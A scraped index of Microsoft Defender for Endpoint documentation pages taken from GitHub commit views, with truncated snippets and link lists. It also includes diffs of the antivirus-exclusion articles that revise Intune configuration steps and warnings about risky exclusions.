https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-microsoft-flow.md

You can also create a **scheduled** flow that runs Advanced Hunting queries and

## Related topic - [Microsoft Defender for Endpoint APIs](apis-intro.md)

security

Api Power Bi

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-power-bi.md

View the Microsoft Defender for Endpoint Power BI report samples. For more infor

- [Defender for Endpoint APIs](apis-intro.md) - [Advanced Hunting API](run-advanced-query-api.md) - [Using OData Queries](exposed-apis-odata-samples.md)

security

Api Release Notes

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-release-notes.md

The following information lists the updates made to the Microsoft Defender for E

### 01.09.2020 - Added option to expand the Alert entity with its related Evidence. See [List Alerts](get-alerts.md).

security

Apis Intro

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/apis-intro.md

You can access Defender for Endpoint API with **Application Context** or **User

- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md) - [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)

security

Application Deployment Via Mecm

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/application-deployment-via-mecm.md

Copy the unified solution package, onboarding script and migration script to the

- [Microsoft Defender for Endpoint - Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection) - [Onboard Windows servers to the Microsoft Defender for Endpoint service](configure-server-endpoints.md) - [Microsoft Defender for Endpoint: Defending Windows Server 2012 R2 and 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292)

security

Assign Portal Access

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/assign-portal-access.md

Defender for Endpoint supports two ways to manage permissions:

- [Use basic permissions to access the portal](basic-permissions.md) - [Manage portal access using RBAC](rbac.md)

security

Attack Simulations

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-simulations.md

Read the walkthrough document provided with each attack scenario. Each document

- [Onboard devices](onboard-configure.md) - [Onboard Windows devices](configure-endpoints.md)

security

Attack Surface Reduction Rules Deployment Implement

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-implement.md

You can customize the notification for when a rule is triggered and blocks an ap

## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)

security

Attack Surface Reduction Rules Deployment Operationalize

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-operationalize.md

For more information about hunting options, see: [Demystifying attack surface re

[Enable attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-implement.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)

security

Attack Surface Reduction Rules Deployment Plan

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-plan.md

See: [Create a deployment plan for Windows](/windows/deployment/update/create-de

[Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)

security

Attack Surface Reduction Rules Deployment Test

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-test.md

Event ID | Description

[Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)

security

Attack Surface Reduction Rules Deployment

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment.md

Some rules don't work well if un-signed, internally developed application and sc

[ASR rules Configurations](https://security.microsoft.com/asr?viewid=configuration) [ASR rules Exclusions](https://security.microsoft.com/asr?viewid=exclusions)

security

Attack Surface Reduction Rules Reference

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference.md

Dependencies: Microsoft Defender Antivirus, Cloud Protection

- [Attack surface reduction $ASR$ rules report](attack-surface-reduction-rules-report.md) - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)

security

Attack Surface Reduction Rules Report

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-report.md

The Add exclusion page has two buttons for actions that can be used on any detec

- [Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) - [Attack surface reduction $ASR$ rules report](attack-surface-reduction-rules-report.md) - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)

security

Attack Surface Reduction

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction.md

The "engine version" listed for attack surface reduction events in the event log

> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

security

Auto Investigation Action Center

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/auto-investigation-action-center.md

To get to the unified Action center in the improved Microsoft 365 Defender porta

- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md) - [Compare security features in Microsoft 365 plans for small and medium-sized businesses](../defender-business/compare-mdb-m365-plans.md)

security

Autoir Investigation Results

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/autoir-investigation-results.md

To provide more context about how investigation states show up, the following ta

- [Review remediation actions following an automated investigation](manage-auto-investigation.md) - [View and organize the Microsoft Defender for Endpoint Incidents queue](view-incidents-queue.md)

security

Automated Investigations

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automated-investigations.md

Currently, AIR only supports the following OS versions:

- [PUA protection](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus) - [Automated investigation and response in Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/air-about) - [Automated investigation and response in Microsoft 365 Defender](/microsoft-365/security/defender/m365d-autoir)

security

Automation Levels

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automation-levels.md

Automated investigation and remediation (AIR) capabilities in Microsoft Defender

- [Configure automated investigation and remediation capabilities in Defender for Endpoint](configure-automated-investigations-remediation.md) - [Visit the Action Center](/microsoft-365/security/defender-endpoint/auto-investigation-action-center#the-action-center)

security

Azure Server Integration

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/azure-server-integration.md

The following capabilities are included in this integration:

- [Onboard previous versions of Windows](onboard-downlevel.md) - [Onboard Windows Server 2012 R2, 2016, SAC version 1803, and 2019](configure-server-endpoints.md)

security

Basic Permissions

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/basic-permissions.md

For more information, see [Assign administrator and non-administrator roles to u

## Related topic - [Manage portal access using RBAC](rbac.md)

security

Batch Update Alerts

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/batch-update-alerts.md

POST https://api.securitycenter.microsoft.com/api/alerts/batchUpdate

"comment": "Resolve my alert and assign to secop2" } ```

security

Behavioral Blocking Containment

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/behavioral-blocking-containment.md

This example shows that with behavioral blocking and containment capabilities, t

- [See recent global threat activity](https://www.microsoft.com/wdsi/threats) - [Get an overview of Microsoft 365 Defender](../defender/microsoft-365-defender.md)

security

Built In Protection

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/built-in-protection.md

Built-in protection is a set of default settings. You aren't required to keep th

- [Configure Microsoft Defender for Endpoint in Intune](/mem/intune/protect/advanced-threat-protection-configure) - [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration) - [Responding to ransomware attacks](../defender/playbook-responding-ransomware-m365-defender.md)

security

Cancel Machine Action

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cancel-machine-action.md

https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-a

## Related article - [Get machine action API](get-machineaction-object.md)

security

Check Sensor Status

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/check-sensor-status.md

You can view the device details when you click on a misconfigured or inactive de

- [Run the client analyzer on Windows](run-analyzer-windows.md) - [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md) - [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)

security

Client Behavioral Blocking

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/client-behavioral-blocking.md

If your organization is using Defender for Endpoint, client behavioral blocking

> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

security

Cloud Protection Microsoft Antivirus Sample Submission

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-antivirus-sample-submission.md

There are two more scenarios where Defender for Endpoint might request a file sa

[Next-generation protection overview](next-generation-protection.md) [Configure remediation for Microsoft Defender Antivirus detections.](configure-remediation-microsoft-defender-antivirus.md)

security

Cloud Protection Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus.md

Cloud protection is enabled by default. However, you might need to re-enable it

If your subscription includes Windows 10 E5, you can take advantage of emergency dynamic intelligence updates, which provide near real-time protection from emerging threats. When you turn on cloud protection, fixes for malware issues can be delivered via the cloud within minutes, instead of waiting for the next update. See [Configure Microsoft Defender Antivirus to automatically receive new protection updates based on reports from our cloud service](manage-event-based-updates-microsoft-defender-antivirus.md#cloud-report-updates).

security

Collect Diagnostic Data Update Compliance

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data-update-compliance.md

On at least two devices that are not reporting or showing up in Update Complianc

- [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)

security

Collect Diagnostic Data

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data.md

You can also specify where the diagnostic .cab file will be created using a Grou

- [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)

security

Collect Investigation Package

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-investigation-package.md

POST https://api.securitycenter.microsoft.com/api/machines/fb9ab6be3965095a09c05

"Comment": "Collect forensics due to alert 1234" } ```

security

Command Line Arguments Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus.md

The following table lists common errors that can occur while using the MpCmdRun

- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

security

Common Errors

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-errors.md

When contacting us about an error, attaching this ID helps find the root cause o

} } ```

security

Common Exclusion Mistakes Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus.md

Title: Common mistakes to avoid when defining exclusions description: Avoid common mistakes when defining exclusions for Microsoft Defender Antivirus scans.

-keywords: exclusions, files, extension, file type, folder name, file name, scans

-ms.sitesec: library

-ms.pagetype: security

ms.localizationpriority: medium

Previously updated : 03/06/2023 Last updated : 07/18/2023 - m365-security - tier2

search.appverid: met150

You can define an exclusion list for items that you don't want Microsoft Defender Antivirus to scan. However, excluded items could contain threats that make your device vulnerable. This article describes some common mistakes that you should avoid when defining exclusions. > [!TIP]

-> Before defining your exclusion lists, see [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).

+> Before defining your exclusion lists, see [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).

## Excluding certain trusted items

-Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust them to be not malicious.

-

-Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections:

+Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust that they're not malicious. Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections:

- [Folder locations](#folder-locations) - [File extensions](#file-extensions)

Don't define exclusions for the folder locations, file extensions, and processes

### Folder locations > [!IMPORTANT]

-> Certain folders shouldn't be excluded from scans because they end up being folders where malicious files can get dropped.

+> Certain folders shouldn't be excluded from scans because they can end up being folders where malicious files can get dropped.

-In general, don't define exclusions for the following folder locations:

+In general, don't define exclusions for any of the following folder locations:

- `%systemdrive%` - `C:`, `C:\`, or `C:\*`

Microsoft Defender Antivirus Service runs in system context using the LocalSyste

See [Use wildcards in the file name and folder path or extension exclusion lists](configure-extension-file-exclusions-microsoft-defender-antivirus.md#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists) for information on how to use wildcards in exclusion lists.

-> [!TIP]

-> If you're looking for Antivirus related information for other platforms, see:

-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)

-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)

-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)

-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)

-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)

-> - [Configure Defender for Endpoint on Android features](android-configure.md)

-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

- ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)

+- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md)

+- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md)

+- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)

++

security

Community

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/community.md

There are several ways you can access the Community Center:

You can instantly view and read conversations that have been posted in the community. To get the full experience within the community such as being able to comment on posts, you'll need to join the community. For more information on how to get started in the Microsoft Tech Community, see [Microsoft Tech Community: Getting Started](https://techcommunity.microsoft.com/t5/Getting-Started/Microsoft-Tech-Community-Getting-Started-Guide/m-p/77888#M15).

security

Comprehensive Guidance On Linux Deployment

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/comprehensive-guidance-on-linux-deployment.md

Then your next step is to uninstall your non-Microsoft antivirus, antimalware, a

- [Privacy for Microsoft Defender for Endpoint on Linux](linux-privacy.md) - [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md)

security

Conditional Access

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/conditional-access.md

The following example sequence of events explains Conditional Access in action:

## Related topic - [Configure Conditional Access in Microsoft Defender for Endpoint](configure-conditional-access.md)

security

Configuration Management Reference Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configuration-management-reference-microsoft-defender-antivirus.md

The following articles provide further information, links, and resources for usi

> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md)

-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

security

Configure Advanced Scan Types Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-advanced-scan-types-microsoft-defender-antivirus.md

If Microsoft Defender Antivirus detects a threat inside an email message, the fo

On any OS, only the network drives that are mapped at system level, are scanned. User-level mapped network drives aren't scanned. User-level mapped network drives are those that a user maps in their session manually and using their own credentials.

security

Configure Automated Investigations Remediation

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation.md

If you're using Defender for Endpoint, you can specify an automation level so th

- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md) - [Automation levels in automated investigation and remediation](automation-levels.md)

security

Configure Block At First Sight Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus.md

If you have a personal device that is not managed by an organization, you might

- [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) - [Stay protected with Windows Security](https://support.microsoft.com/windows/stay-protected-with-windows-security-2ae0363d-0ada-c064-8b56-6a39afb6a963) - [Onboard non-Windows devices](configure-endpoints-non-windows.md)

security

Configure Cloud Block Timeout Period Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-cloud-block-timeout-period-microsoft-defender-antivirus.md

You can use Group Policy to specify an extended timeout for cloud checks.

> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)

security

Configure Conditional Access

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-conditional-access.md

Take the following steps to enable Conditional Access:

For more information, see [Enforce compliance for Microsoft Defender for Endpoint with Conditional Access in Intune](/intune/advanced-threat-protection). > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-conditionalaccess-belowfoldlink)

security

Configure Contextual File Folder Exclusions Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md

To exclude a file or folder only when accessed by a specific process, create a n

After constructing your desired contextual exclusions, you can use your existing management tool to configure file and folder exclusions using the string you created. See: [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)

security

Configure Device Discovery

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-device-discovery.md

DeviceInfo

- [Device discovery overview](device-discovery.md) - [Device discovery FAQs](device-discovery-faq.md)

security

Configure Endpoints Gp

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-gp.md

When you configure cloud protection level policy to **Default Microsoft Defender

- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint devices](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)

security

Configure Endpoints Mdm

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-mdm.md

For more information on Microsoft Intune policy settings, see [Windows 10 policy

- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)

security

Configure Endpoints Non Windows

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-non-windows.md

You can also offboard non-Windows devices by disabling the third-party integrati

- [Onboard servers](configure-server-endpoints.md) - [Configure proxy and Internet connectivity settings](configure-proxy-internet.md) - [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)

security

Configure Endpoints Sccm

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-sccm.md

For more information, see [Introduction to compliance settings in System Center

- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)

security

Configure Endpoints Script

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-script.md

Monitoring can also be done directly on the portal, or by using the different de

- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)

security

Configure Endpoints Vdi

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-vdi.md

The following configuration settings are recommended:

- [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md) - [Onboard Windows devices using a local script](configure-endpoints-script.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)

security

Configure Exclusions Microsoft Defender Antivirus

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-exclusions-microsoft-defender-antivirus.md

Title: Set up exclusions for Microsoft Defender Antivirus scans

-description: You can exclude files (including files modified by specified processes) and folders from being scanned by Microsoft Defender Antivirus. Validate your exclusions with PowerShell.

-keywords:

+ Title: Configure custom exclusions for Microsoft Defender Antivirus

+description: You can exclude files (including files modified by specified processes) and folders from Microsoft Defender Antivirus scans.

-ms.sitesec: library

ms.localizationpriority: medium Previously updated : 04/14/2023 Last updated : 07/18/2023

search.appverid: met150

-# Configure and validate exclusions for Microsoft Defender Antivirus scans

+# Configure custom exclusions for Microsoft Defender Antivirus

**Applies to:** - [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

search.appverid: met150

**Platforms** - Windows

-You can exclude certain files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. Such exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection.

+In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. However, if necessary, you can exclude files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. These types of exclusions are known as custom exclusions. This article describes how to define custom exclusions for Microsoft Defender Antivirus with Microsoft Intune and includes links to other resources for more information.

+

+Custom exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection.

> [!TIP] > For a detailed overview of suppressions, submissions, and exclusions across Microsoft Defender Antivirus and Defender for Endpoint, see [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). ## Configure and validate exclusions

-To configure and validate exclusions, see the following:

+> [!CAUTION]

+> Use Microsoft Defender Antivirus extensions sparingly. Make sure to review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).

+

+If you're using Microsoft Intune to manage Microsoft Defender Antivirus or Microsoft Defender for Endpoint, use the following procedures to define exclusions:

+

+- [Manage antivirus exclusions in Intune (for existing policies)](#manage-antivirus-exclusions-in-intune-for-existing-policies)

+- [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune)

+

+If you're using another tool, such as Configuration Manager or Group Policy, or you want more detailed information about custom exclusions, see these articles:

+

+- [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)

+- [Configure exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)

+- [Configure contextual file and folder exclusions](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md) to configure restrictions for your exclusions.

+

+#### Manage antivirus exclusions in Intune (for existing policies)

+

+1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus**, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune).)

+

+2. Choose **Properties**, and next to **Configuration settings**, choose **Edit**.

+

+3. Expand **Microsoft Defender Antivirus Exclusions** and then specify your exclusions.

+

+ - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).

+ - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).

+ - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).

+

+4. Choose **Review + save**, and then choose **Save**.

-- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md). You can exclude files from Microsoft Defender Antivirus scans based on their file extension, file name, or location.

+#### Create a new antivirus policy with exclusions in Intune

-- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md). You can exclude files from scans that have been opened by a specific process.

+1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus** \> **+ Create Policy**.

-## Recommendations for defining exclusions

+2. Select a platform (such as **Windows 10, Windows 11, and Windows Server**).

-> [!IMPORTANT]

-> Microsoft Defender Antivirus includes many automatic exclusions based on known operating system behaviors and typical management files, such as those used in enterprise management, database management, and other enterprise scenarios and situations. For more information, see [automatic exclusions](configure-server-exclusions-microsoft-defender-antivirus.md).

->

-> Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious.

+3. For **Profile**, select **Microsoft Defender Antivirus exclusions**, and then choose **Create**.

-> [!NOTE]

-> Exclusions directly impact the ability for Microsoft Defender Antivirus to block, remediate or inspect events related to the files, folders or processes that are added to the exclusion list. This means that features which are directly dependent on the AV engine such as protection against malware, file IOCs and certificate IOCs will not be effective. Furthermore, the **Network Protection** and **Attack Surface Reduction (ASR) Rules** are also impacted by process exclusions specifically, meaning that a process exclusion on any platform will result in Network Protection or ASR being unable to inspect traffic or enforce rules for that specific process.

+4. On the **Create profile** step, specify a name and description for the profile, and then choose **Next**.

+

+5. On the **Configuration settings** tab, specify your antivirus exclusions, and then choose **Next**.

+

+ - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).

+ - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).

+ - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).

+

